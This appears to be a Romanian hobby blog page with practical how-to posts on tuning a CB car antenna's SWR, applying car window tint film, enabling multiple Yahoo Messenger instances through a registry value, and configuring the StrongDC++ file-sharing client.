Pasul 1: Se leaga antena la borna "ANT" a reflectometrului, se face conexiunea cu cablul prezentat mai sus dintre statie si borna "Tx" a reflectometrului si bineinteles se alimenteaza si se porneste statia. Antena va trebui in prealabil de asemenea instalata pe masina, prefereabil la centrul plafonului (nu intru in detalii) sau in orice loc prefereat de voi (pe capacul portbagajului, etc).
Pasul 2: Se trece comutatorul refectometrului pe pozitia "CAL" (sau "FWD" dupa caz), se intra cu statia in emisie prin apasarea PTT-ului de la microfon si se roteste potentiometrul "CAL" astfel incat acul sa fie pozitionat la capat de scala. Se trece comutatorul pe pozitia "SWR" si se citeste valoarea obtinuta.
Pasul 3: Se trece statia pe canalul 40, se repeta aceeasi operatiune si se citeste valoarea de pe canalul 40.
Pasul 4: Daca valoarea obtinuta pe canalul 1 este mai mare decat cea obtinuta pe canalul 40 atunci se desfac suruburile de la spicul antenei si acesta va trebui pozitionat mai sus in bobina. Daca pe canalul 40 avem o valoare mai mare decat pe canalul 1 spicul va trebui bagat mai mult in bobina (mai jos). Daca acesta a fost bagat la maxim, va trebui taiat din el un (1) cm.
Pasul 5: Se repeta pasii 2-3-4 pana cand valoarea de pe canalul 1 este egala cu valoarea obtinuta pe canalul 40.
Pasul 6: La final se masoara valoarea de pe canalul 20 (sau 22 pt canalul Infotrafic din Romania) pentru a vedea pierderile de putere in functie de valoarea obtinuta pentru reflectata.
Dupa cum v-ati dat seama, prin aceasta operatiune se urmareste ca valorile reflectatei de pe canalele 1 si 40 sa fie egale si cat mai mici (cat mai apropiate de 1 - vezi tabelul de mai jos cu pierderile pentru fiecare valoare a SWR-ului in parte). Reflectata ideala este bineinteles 1.0:1
Se trece comutatorul refectometrului pe pozitia "CAL" (sau "FWD" dupa caz), se intra cu statia in emisie prin apasarea PTT-ului de la microfon si se roteste potentiometrul "CAL" astfel incat acul sa fie pozitionat la capat de scala. Se trece comutatorul pe pozitia "SWR" si se citeste valoarea obtinuta.
MONTARE FOLIE AUTO
MONTARE FOLIE AUTO
Pas 1
Curatarea exterioara
Partea exterioara a fiecarui geam trebuie bine curatata, in sensul acelor ceasornicului (incepind cu pozitia acelor la ora 1 sau locul pasagerului din fata). In acest mod este redusa posibilitatea de murdarire, oferind folie auto o mai buna aderenta (la sticla) in procesul de ajustare si aplicare. Fiecare geam trebuie coborit cu grija, pentru a se indeparta murdaria de pe partea superioara a sticlei, aceasta fiind cea mai expusa la depuneri de praf.
In acest scop, pulverizati usor cu solutie de aplicare a folie (Film-On) sau cu o solutie de curatat geamuri. Ajustarea folie auto la forma necesara va fi efectuata, in mod obisnuit, pe suprafata exterioara. Este o metoda rapida si de mare acuratete, mai ales prin aplicarea unor mici trucuri. In cele din urma, se va aplica folia auto pe suprafetele interioare ale sticlei.
Pas 2
Ajustare folie auto
Pe suprafata exterioara a geamului se pulverizeaza usor cu solutia de aplicare a folie (Film-On). Se aplica folia auto, se intinde cu atentie si grija, apoi se ajusteaza la marimea geamului. Marginile flexibile, care depasesc perimetrul geamului, contureaza suprafata acestuia, oferind un avantaj instalatorilor experimentati. Taierea folie auto va fi efectuata cu usurinta, dintr-un unghi potrivit, fara a aduce prejudicii garniturii sau sticlei.
Conform principiului ca este mai bine sa incepi cu partea mai usoara, instalatorii aplica si ajusteaza folia auto pe geamurile laterale, mai accesibile. Luneta va fi ultimul geam pe care se va aplica folie.
Pas 3
Tratarea cu caldura a folie auto
Dupa ajustarea folie auto la marimea geamului, orice curbura a sticlei va fi vizibila. Majoritatea lunetelor si o buna parte din geamurile laterale au o curbura sferica abia perceptibila, impiedicind lipirea perfecta a folie auto pe sticla. Efectul produs asupra folie auto este numit "fingering", adica formarea unor spatii cu aer intre folie auto si geam, cauzind crearea de amprente pe geam. Exista o solutie extrem de eficienta in acest caz, si anume pistolul cu caldura. Daca este bine minuit, folia se va mula perfect pe majoritatea geamurilor curbate. Putem spune adio zilelor in care majoritatea lunetelor necesitau aplicarea mai multor mici fisii pentru a acoperi acele curburi.
Contractarea cu ajutorul caldurii este efectuata inaintea instalarii, metoda care salveaza timp si previne agravarea persistentei efectului de fingering. Tratarea cu caldura este probabil cea mai eficienta procedura pentru o instalare rapida si rezultate maxime.
Pas 4
Curatarea interioara a geamului
Cind ajustarea sau tratarea cu caldura s-a incheiat, suprafata interioara a geamului trebuie tratata cu un puternic agent lichid de curatare (Dirt Off). Majoritatea suprafetelor pot fi rase apoi periate cu o perie de nailon, pentru a indeparta agentii grasi de murdarire. In cele din urma, se indeparteaza orice surplus de pe suprafata geamului, marginile sint curatate cu o cirpa uscata, iar geamurile de odinioara capata nuanta dorita (colorata sau metalica). Lunetele necesita un tratament mai precaut (mai ales cele avind system de dezaburire sau margini punctate).
Pas 5
Scoaterea garniturii
Dupa curatarea geamului se scoate garnitura de protectie a folie si adezivul de la suprafata se pulverizeaza cu solutia de aplicare. Aceasta reduce pentru moment reactia de presare a adezivului si permite folie auto sa alunece incet spre suprafata interioara curata a geamului. Dupa pulverizarea suprafetei adezive a folie auto , se pulverizeaza si suprafata interioara a geamului. In timp, au luat amploare multiple tehnici ingenioase de usurare a acestui proces si minimalizare a riscului de contaminare in timpul procedurii de aplicare a folie auto.
Pas 6
Montarea folie auto pe Geamurile Laterale
Odata cu scoaterea garniturii si cu aplicarea solutiei pulverizate atat peste suprafata geamului cat si peste partea adeziva a folie auto, aceasta poate fi acum pusa la loc - Folie auto
Pas 7
Montarea folie auto pe Geamurile din Spate (luneta)
Asa cum am aratat, geamurile din spate reprezinta o provocare pentru instalatori, asa ca le vom dedica un spatiu mai generos pentru discutarea si ilustarea multitudinilor de tehnic de montare de folie auto. Procesul de punere a folie cere o atentie deosebita pentru a mentine folia umeda la suprafata. Pot fi realizate tehnici speciale de prelucrare permitand unui instalator sa puna un geam din spate, de dimensiuni mari, dintr-o singura bucata de folie auto fara ajutor specializat.
Pas 8
Presarea folie auto
Imediat dupa ce fiecare model de folie auto este pus in pozitia finala, suprafata geamului se pulverizeaza din nou cu solutie de aplicare pentru a lubrifia presarea si a pregati montarea de folie auto. Sunt folosite dispozitive speciale de presare pentru a extrage toate bulele de aer si cat mai multa solutie de aplicare. Portiunile reziduale umede de pe straturile folie auto se vor usca in cateva zile. Timpul de uscare va fi diferit si depinde de temperatura, umiditate, compozitia folie auto si de cantitatea de umezeala ramasa in urma presarii de folie auto.
Pas 9
Verificarea Marginilor/Ermetizarea
Toate marginile folie auto sunt verificate si ermetizate cu 'suport dur' de teflon ( sau unul apartinand multitudinii de unelte). Toate marginile trebuie sa fie ermetizate pentru a impiedica particulele de apa, aer si praf sa se strecoare in interiorul peliculei in timpul procesului de tratare. De multe ori aceste unelte de pe margine vor fi acoperite cu un material absorbant ( prosop de hartie sau material din bumbac) pentru a tampona umezeala extrasa.
Pas 10
Revizia finala & Verificarea
Cand instalarea este completa, toate geamurile sunt curatate ( la interior si la exterior) pentru a inlatura toate urmele si petele si pentru a conferi intregului vehicul un aspect lustruit. Verificati zonele problema: o bula aici, un mic gol de apa acolo, sau de luat o mica scama de pe margine. Dupa curatare, faceti o inspectie vizuala finala a geamurilor exterioare ale vehiculului(analiza de folie auto).
Yahoo Multi Messenger
Cum sa rulati mai multe instante de Yahoo Messenger (MultiMessenger):
1. START -> RUN -> scrieti "regedit" apoi apasati ENTER
2. Navigati la "HKEY_CURRENT_USER\Software\Yahoo\Pager\Test"
3. In panoul din dreapta click pe New->DOWRD Value. Numiti-l "Plural"
4. Dublu-click pe DWORD creat si setati valoarea pe 1.
Pentru cei mai comozi am atasat doua chei de registri pentru instalare respectiv dezinstalare.
Download
1. START -> RUN -> scrieti "regedit" apoi apasati ENTER
2. Navigati la "HKEY_CURRENT_USER\Software\Yahoo\Pager\Test"
3. In panoul din dreapta click pe New->DOWRD Value. Numiti-l "Plural"
4. Dublu-click pe DWORD creat si setati valoarea pe 1.
Pentru cei mai comozi am atasat doua chei de registri pentru instalare respectiv dezinstalare.
Download
Configurare strongDC++
Configurare strongDC++
Prima configurare (prima utilizare)
Dupa ce l-ai instalat (prima fereastra este cea de configurare, la prima utilizare), deschide programul... apoi...
>>> File :
>>> Settings :
>>> Personal Information :
Nick : ........... (preferabil ceva de genul [RO][B][RDS]nick)
E-mail : ..... nu e obligatoriu
Description : ......date despre tine... nu e obligatoriu
Connection Type : ..... de regula Cable ... nu e obligatoriu
>>> Downloads
- Default download directory ... browse -stabilesti in ce director se vor stoca pe HDD tau fisierele complet descarcate
- Unfinished downloads directory ... browse - stabilesti in ce director se vor stoca pe HDD tau fisierele incomplet descarcate (la descarcarea completa vor fi mutate automat in directorul de complete)
FOARTE IMPORTANT ! (in aceeasi fereastra de downloads)
- !!! Configure public hub lists... apasa butonul...programul are doua liste de huburi publice internationale... pentru a adauga o lista noua de hub-uri, ca spre ex. o lista cu peste 100 de hub-uri cu utilizatori din Romania (viteza de download mai mare...) : http://www.strong-dc.ro/huburi.config , da-i copy/paste la url-ul mentionat si apasa Add...
- Pentru a vizualiza si a te conecta la oricare din hub-urile din lista trebuie sa apesi pe icon-ul cu monitorul de sub meniul "File"...
- Pentru a te conecta la un hub da-i dublu click... fiecare hub (retea individuala de utilizatori) are regulile ei, pe care trebuie sa le respectzi pentru a nu fi dat afara din hub... pentru a incarca automat, odata cu DC++, hub-ul sau hub-urile care preferate (din punct de vedere al informatiilor sharuite ori a utilizatorilor din acel hub) trebuie sa tastezi "/fav" in meniul cu dialoguri de pe hub-ul respectiv... !!!
>>> Sharing
>>> Add folder : ca sa ai acces pe hub-uri, trebuie sa ai si tu cateva fisiere "sharuite", puse in comun pe comunitatea DC++. Astfel, trebuie sa adaugi cateva directoare cu propriile tale informatii de care pot fi interesati ceilalti care intra pe DC... directoare cu filme, muzica, utilitare, jocuri, etc... cu cat mai mult "sharuieshti", cu atat esti mai respectat pe "hub-ul" pe care intri...
>>> Upload slots : aici trebuie sa treci neaparat un nr. mai mare de 5 daca lasi o (zero) nu o sa ti se permita sa ramai pe hub-urile pe care intri... e vorba de cate conexiuni de upload permiti sa se realizeze simultan de pe calculatorul tau catre ceilalti utilizatori de DC... cati pot sa descarce simultan de la tine diverse fisiere... daca ai conexiunea slaba, upload-ul influenteaza traficul si implicit viteza cu care descarci tu fisiere, asha ca se recomanda sa treci 5-10 sloturi... daca ai viteza buna poti sa treci 99...
http://www.strong-dc.ro/configurare_strong_dc.html
Prima configurare (prima utilizare)
Dupa ce l-ai instalat (prima fereastra este cea de configurare, la prima utilizare), deschide programul... apoi...
>>> File :
>>> Settings :
>>> Personal Information :
Nick : ........... (preferabil ceva de genul [RO][B][RDS]nick)
E-mail : ..... nu e obligatoriu
Description : ......date despre tine... nu e obligatoriu
Connection Type : ..... de regula Cable ... nu e obligatoriu
>>> Downloads
- Default download directory ... browse -stabilesti in ce director se vor stoca pe HDD tau fisierele complet descarcate
- Unfinished downloads directory ... browse - stabilesti in ce director se vor stoca pe HDD tau fisierele incomplet descarcate (la descarcarea completa vor fi mutate automat in directorul de complete)
FOARTE IMPORTANT ! (in aceeasi fereastra de downloads)
- !!! Configure public hub lists... apasa butonul...programul are doua liste de huburi publice internationale... pentru a adauga o lista noua de hub-uri, ca spre ex. o lista cu peste 100 de hub-uri cu utilizatori din Romania (viteza de download mai mare...) : http://www.strong-dc.ro/huburi.config , da-i copy/paste la url-ul mentionat si apasa Add...
- Pentru a vizualiza si a te conecta la oricare din hub-urile din lista trebuie sa apesi pe icon-ul cu monitorul de sub meniul "File"...
- Pentru a te conecta la un hub da-i dublu click... fiecare hub (retea individuala de utilizatori) are regulile ei, pe care trebuie sa le respectzi pentru a nu fi dat afara din hub... pentru a incarca automat, odata cu DC++, hub-ul sau hub-urile care preferate (din punct de vedere al informatiilor sharuite ori a utilizatorilor din acel hub) trebuie sa tastezi "/fav" in meniul cu dialoguri de pe hub-ul respectiv... !!!
>>> Sharing
>>> Add folder : ca sa ai acces pe hub-uri, trebuie sa ai si tu cateva fisiere "sharuite", puse in comun pe comunitatea DC++. Astfel, trebuie sa adaugi cateva directoare cu propriile tale informatii de care pot fi interesati ceilalti care intra pe DC... directoare cu filme, muzica, utilitare, jocuri, etc... cu cat mai mult "sharuieshti", cu atat esti mai respectat pe "hub-ul" pe care intri...
>>> Upload slots : aici trebuie sa treci neaparat un nr. mai mare de 5 daca lasi o (zero) nu o sa ti se permita sa ramai pe hub-urile pe care intri... e vorba de cate conexiuni de upload permiti sa se realizeze simultan de pe calculatorul tau catre ceilalti utilizatori de DC... cati pot sa descarce simultan de la tine diverse fisiere... daca ai conexiunea slaba, upload-ul influenteaza traficul si implicit viteza cu care descarci tu fisiere, asha ca se recomanda sa treci 5-10 sloturi... daca ai viteza buna poti sa treci 99...
http://www.strong-dc.ro/configurare_strong_dc.html
Abonați-vă la:
Postări (Atom)
